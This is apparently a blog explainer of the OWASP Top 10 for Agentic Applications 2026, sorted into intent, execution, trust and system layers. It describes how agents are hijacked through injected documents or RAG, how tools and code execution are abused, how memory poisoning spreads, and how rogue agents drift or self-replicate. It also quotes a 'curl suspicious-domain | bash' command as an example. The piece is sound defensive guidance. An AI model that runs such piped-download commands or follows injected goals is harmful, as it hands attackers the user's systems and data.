A New Security Crisis: AI Is No Longer Just Answering Questions#
If you still think of large language models (LLMs) as “chatbots that answer questions,” you may be underestimating the systemic risk of the next two years.
In 2023, AI systems mostly worked like this:
flowchart LR
A([User Prompt]) --> B[LLM] --> C([Answer])
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
The most serious problems were limited to Prompt Injection, Hallucination, data leakage, and Jailbreaking. Models could say the wrong things, but they rarely caused real-world consequences.
By 2025–2026, enterprise AI systems have evolved into something entirely different:
flowchart TD
A([User Request]) --> B[Planner Agent]
B --> C[(Memory / RAG)]
B --> D[Tool Calling]
D --> E[Code Execution]
D --> F[Other Agents]
E --> G([Real-world Actions])
F --> G
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style G fill:#DC2626,stroke:#EF4444,color:#FFFFFF
AI no longer just “generates text.” It now autonomously breaks down tasks (Planning), calls APIs (Tool Use), executes Shell/SQL/Python, accesses enterprise data, collaborates with other Agents, and maintains long-term memory.
In other words: we are handing “execution authority” to AI.
This is why OWASP released the Top 10 for Agentic Applications 2026 — Agentic AI security is no longer just about model safety. It is about Autonomous Systems Security.
Why the Traditional LLM Security Model Has Failed#
The old security assumption was: models might give wrong answers, but they won’t act on their own. The focus was “Protect the Output.”
But Agentic AI has changed that assumption. AI can now “Act”:
flowchart LR
A[Observe] --> B[Reason] --> C[Plan] --> D[Tool Use] --> E[Execute] --> F[Persist]
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#DC2626,stroke:#EF4444,color:#FFFFFF
Rethinking the OWASP Agentic Top 10: A Four-Layer Security Model#
The 10 threats (ASI01–ASI10) can be reorganized into four layers with a clear causal relationship:
flowchart TD
L1["🎯 Layer 1:Intent Layer\nASI01 · ASI09 · ASI10"]
L2["⚙️ Layer 2:Execution Layer\nASI02 · ASI05"]
L3["🔐 Layer 3:Trust Layer\nASI03 · ASI07"]
L4["🌐 Layer 4:System Layer\nASI04 · ASI06 · ASI08"]
L1 -->|"Intent poisoned, execution weaponized"| L2
L2 -->|"Lateral movement via trust relationships"| L3
L3 -->|"Local failures cascade at the system layer"| L4
style L1 fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style L2 fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style L3 fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style L4 fill:#1F2937,stroke:#4B5563,color:#FFFFFF
Each layer amplifies the next.
Layer 1: Intent Layer#
Core question: What does the AI actually want to do?
Everything starts here. The most efficient attack vector isn’t breaking into a system — it’s changing the AI’s goal. Once the goal is poisoned, every downstream capability, trust relationship, and system resource works for the attacker.
Threats: ASI01 Agent Goal Hijack, ASI09 Human-Agent Trust Exploitation, ASI10 Rogue Agents
ASI01 — Agent Goal Hijack#
This is AI intent being hijacked. The scariest part: the Agent appears to still be following your commands, but is actually working for the attacker — and has no idea.
The original document draws clear boundaries: ASI01 is the attacker directly altering the Agent’s goals and decision pathways (via documents, emails, or RAG injection); ASI06 (Memory Poisoning) is persistent corruption of stored memory; ASI10 (Rogue Agents) is behavioral drift without active attacker control.
ASI09 — Human-Agent Trust Exploitation#
Humans are too quick to trust AI, especially when it appears fluent, confident, and authoritative — producing Automation Bias.
Example: an engineer pastes curl suspicious-domain | bash suggested by Copilot without questioning it, because “AI should know what it’s doing.” A finance manager approves an urgent payment recommended by Copilot without a second check.
The original document highlights a disturbing characteristic: the Agent acts as an “untraceable bad influence” — it manipulates humans into performing the final, audited action, making the Agent’s role invisible in forensic investigation. After the fact, the audit trail shows “human approved.”
Many companies assume AI → Human Approval is safe. In reality, the human is just rubber-stamping.
ASI10 — Rogue Agents#
The Agent begins deviating from its original goal, but each individual action appears legitimate. This is the most dangerous aspect — traditional rule-based systems cannot detect it because no single step triggers an alert.
The original document is precise: ASI10 is about governance failure after the drift begins, not the initial intrusion. External attacks can trigger the deviation, but ASI10 describes the behavioral loss of control and spread that follows — including Reward Hacking, Workflow Hijacking, and even Agent Self-Replication persisting across networks.
Intent Layer core lesson: When AI’s goal goes off course — whether hijacked by an attacker (ASI01), enabled by human over-trust (ASI09), or self-deviated (ASI10) — every downstream capability becomes an attack tool. This is why the Intent Layer is the first line of defense.
Layer 2: Execution Layer#
Core question: What can the AI do?
Once intent is poisoned, execution capability determines the scale of damage. An AI that can only generate text might say the wrong things. An AI that can call APIs, execute shell commands, and write to databases causes real, irreversible consequences when its intent goes wrong.
Threats: ASI02 Tool Misuse and Exploitation, ASI05 Unexpected Code Execution (RCE)
ASI02 — Tool Misuse and Exploitation#
AI used to only talk. Now it can act. The problem is the Tool execution boundary.
When an Agent with access to Gmail, databases, shell, and payment APIs gets its prompt poisoned, legitimate permissions become weapons. This isn’t credential theft — it’s Delegated Abuse. The attacker never obtained your keys; they simply made the Agent use your keys to do what they wanted.
ASI05 — Unexpected Code Execution#
This is the RCE (Remote Code Execution) of the AI era. More and more Vibe Coding Agents can Generate Code and Execute Code directly. Attackers don’t need to find system vulnerabilities — they just need to get the Agent to write and run malicious instructions.
flowchart LR
A[Generate] -->|"❌ Direct execution"| E([💥 RCE])
A --> B[Validation] --> C[Sandbox] --> D[Approval] --> F([✅ Safe Execution])
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style D fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style E fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style F fill:#16A34A,stroke:#22C55E,color:#FFFFFF
Execution Layer core lesson: Execution capability is neutral — it makes AI more useful, and makes the consequences of attacks more severe. Defense isn’t about reducing capability, but about establishing an unavoidable validation gate before every execution action.
Layer 3: Trust Layer#
Core question: How much is the AI trusted?
With execution capability established, the question becomes: how far can that capability reach? Identity and trust determine the lateral movement range of an attack. A compromised Agent with broad identity trust can move freely through an entire multi-agent system, carrying damage from one Agent to the next.
Threats: ASI03 Identity & Privilege Abuse, ASI07 Insecure Inter-Agent Communication
ASI03 — Identity & Privilege Abuse#
The biggest enterprise mistake: giving Agents omnipotent permissions. When an Agent gets compromised, the attacker moves laterally with full authority.
The original document identifies a deep architectural root cause — architectural mismatch. Existing identity systems are designed around humans: one person, one set of credentials, one set of permissions. Agents are dynamic, multi-task, and delegatable — existing systems have no governance model for this identity type. Without their own governed identity, Agents borrow human identities or service accounts, whose permissions far exceed what any single task requires.
ASI07 — Insecure Inter-Agent Communication#
As enterprises build Multi-Agent Architectures, inter-agent communication also requires Zero Trust.
ASI07 focuses on real-time message security between agents, spanning the transport, routing, discovery, and even semantic layers — the most overlooked attack surface.
Trust Layer core lesson: Trust is the attacker’s fast lane. Zero Trust applies not just to humans, but to every Agent, every message, and every tool invocation.
Layer 4: System Layer#
Core question: How does the AI ecosystem spiral out of control?
Without system-layer defenses, problems from the first three layers will eventually detonate here. Localized intent poisoning, individual execution errors, and limited trust abuse are all amplified into system-wide catastrophe at this layer.
Threats: ASI04 Agentic Supply Chain Vulnerabilities, ASI06 Memory & Context Poisoning, ASI08 Cascading Failures
ASI04 — Agentic Supply Chain#
MCP (Model Context Protocol), ecosystem plugins, and third-party tools — all are attack surfaces.
Agentic supply chains differ fundamentally from traditional software supply chains: runtime composition. Traditional software locks in all dependencies at deploy time, allowing static scanning to catch issues before launch. But Agents dynamically discover and connect to tools at runtime — they see an MCP server describing its capabilities and decide in the moment whether to trust and call it.
ASI06 — Memory & Context Poisoning#
This is especially critical for RAG (Retrieval-Augmented Generation) architectures and is the long-term risk enterprises most often overlook.
The most dangerous characteristic highlighted in the original document is Cross-agent propagation: poisoned memory or shared context spreads between collaborating Agents, causing long-term data leakage or coordinated drift.
flowchart LR
A[Malicious PDF] --> B[OCR] --> C[Embedding] --> D[(Vector DB)]
D -->|"Poison spreads"| E[Agent A]
D -->|"Poison spreads"| F[Agent B]
D -->|"Poison spreads"| G[Agent C]
E <-->|"Cross-agent propagation"| F
F <-->|"Cross-agent propagation"| G
style A fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#7C3AED,stroke:#8B5CF6,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style G fill:#D97706,stroke:#F59E0B,color:#FFFFFF
A malicious PDF entering the Vector DB is just the starting point. The real danger is that the contamination propagates through inter-agent collaboration and can persist even after the original poisoned source is removed. This is a highly latent attack — often invisible until a critical decision goes wrong.
ASI08 — Cascading Failures#
This is the most important concept in the entire whitepaper, and the most commonly misunderstood.
Because an Agent’s output becomes the next Agent’s input, small errors become large ones. More dangerously: AI acts autonomously, far faster than humans can intervene — by the time humans detect the problem, the error may have propagated everywhere.
Observable symptoms include: rapid fan-out (one faulty decision triggering many downstream Agents quickly), cross-boundary spread, oscillating retry loops between Agents, and downstream queue storms.
System Layer core lesson: Even with strong defenses at the first three layers, the system layer needs its own containment design. Assume errors will occur — the question is whether you can contain them before they detonate.
Three Design Principles#
After reading this OWASP document, three mental shifts stand out as most actionable for enterprise architects:
From “Maximum Intelligence” to “Least Agency”. If rule-based logic can handle it, don’t hand it to an LLM. OWASP uses “Least Agency” to echo the security principle of “Least Privilege” — deploying unnecessary agentic behavior only expands the attack surface without adding value. AI doesn’t need more freedom than humans; it needs to be sufficiently reliable.
From “Preventing Errors” to “Containment Engineering”. Real safety isn’t making models never err — it’s ensuring that when they do err, the damage is contained. Blast radius control is more practical and achievable than hallucination prevention. Designing an AI system means designing its failure boundaries.
From “Zero Trust for Humans” to “Zero Trust for Everything”. Zero Trust must extend beyond humans to every Agent, Tool, Memory store, Context object, and peer Agent. Never pre-trust something just because it’s an “internal Agent.” Trust is the attacker’s fast lane — and it runs in both directions.
Conclusion#
The most important reminder from OWASP Top 10:
The core risk of Agentic AI isn’t whether the model says the wrong things — it’s that the model can now do things on its own.
The central AI security question is no longer:
| |
It is:
| |
The competitiveness of future AI systems depends not only on how smart the model is, but on: whether it can be safely constrained when it makes mistakes.
Autonomy without containment is just disaster.
Glossary#
| Term | Definition |
|---|---|
| LLM | Large Language Model — AI models like GPT, Claude, Gemini |
| Agentic AI | AI systems with autonomous planning and execution capabilities, able to complete multi-step tasks continuously |
| Prompt Injection | An attack that manipulates AI into executing unintended instructions through malicious input |
| Hallucination | When a model produces output that appears plausible but is factually incorrect |
| Jailbreak | Bypassing a model’s safety restrictions through specially crafted prompts |
| RAG | Retrieval-Augmented Generation — lets models query external knowledge bases before responding |
| MCP | Model Context Protocol — a standard protocol for connecting AI to external tools and services |
| RCE | Remote Code Execution — an attacker can execute arbitrary code on a target system |
| Zero Trust | A security architecture that defaults to trusting nothing; every access request must be verified |
| Least Privilege | Only granting the minimum permissions necessary to complete a task |
| Least Agency | Only granting AI the minimum autonomous capability necessary to complete a task |
| mTLS | Mutual TLS — both communicating parties authenticate each other’s identity |
| SBOM | Software Bill of Materials — an inventory of all software dependencies |
| AIBOM | AI Bill of Materials — the AI equivalent of SBOM, covering models, tools, datasets, and other AI dependencies |
| Automation Bias | The cognitive bias of over-trusting automated systems, reducing critical judgment |
| Reward Hacking | When AI exploits loopholes in goal definitions to achieve unintended but metric-satisfying results |
| Circuit Breaker | A design pattern that automatically cuts off traffic when anomalies occur, preventing error propagation |
| Blast Radius | The maximum scope of impact from a single failure or attack |
| Just-in-Time Credentials | Short-lived access permissions that expire immediately after use |
| Non-Human Identity (NHI) | Non-human principals such as AI Agents, service accounts, and API keys |
This article is based on the OWASP Top 10 for Agentic Applications 2026 (December 2025). The four-layer framework (Intent / Execution / Trust / System Layer) represents the author’s interpretive perspective, not OWASP’s original classification.